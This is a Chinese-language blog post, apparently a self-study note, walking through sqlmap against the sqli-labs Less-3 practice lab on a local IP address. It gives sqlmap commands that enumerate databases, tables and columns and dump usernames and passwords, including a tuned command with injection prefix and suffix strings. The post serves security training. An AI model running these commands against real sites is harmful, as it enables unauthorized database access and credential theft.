網絡安全-sqlmap實戰之sqlilabs-Less3

目錄

類型

注入判斷

-dbs枚舉數據庫

-tables枚舉表

 -columns枚舉列

-dump枚舉數據

查看源代碼


類型

字符串轉換錯誤,他又提示輸入數字型ID,應該是把數字轉換爲了字符串

注入判斷

截圖

 結合課程1,猜測sql語句爲

select * from users where id = ('參數') LIMIT 0,1

-dbs枚舉數據庫

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs
4種注入方式

 

枚舉數據庫

-tables枚舉表

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -tables
枚舉表

 -columns枚舉列

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -T users -columns
枚舉列

-dump枚舉數據

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -T users -C username,password -dump
枚舉數據

查看源代碼

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

 今後的課程應該會更難,我將添加已知信息,比如,已知數據庫爲mysql,則使用--dbms,已知部分sql信息,例如本次課程的(),使用--prefix和--suffix,以及-o、--threads等進行優化,例如:

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql --prefix="')" --suffix=" AND ('abc'='abc'" -o  -D security -T users -C username,password -dump

 sqlmap使用參考下方文章中的sqlmap使用筆記。

更多內容查看:網絡安全-自學筆記

有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章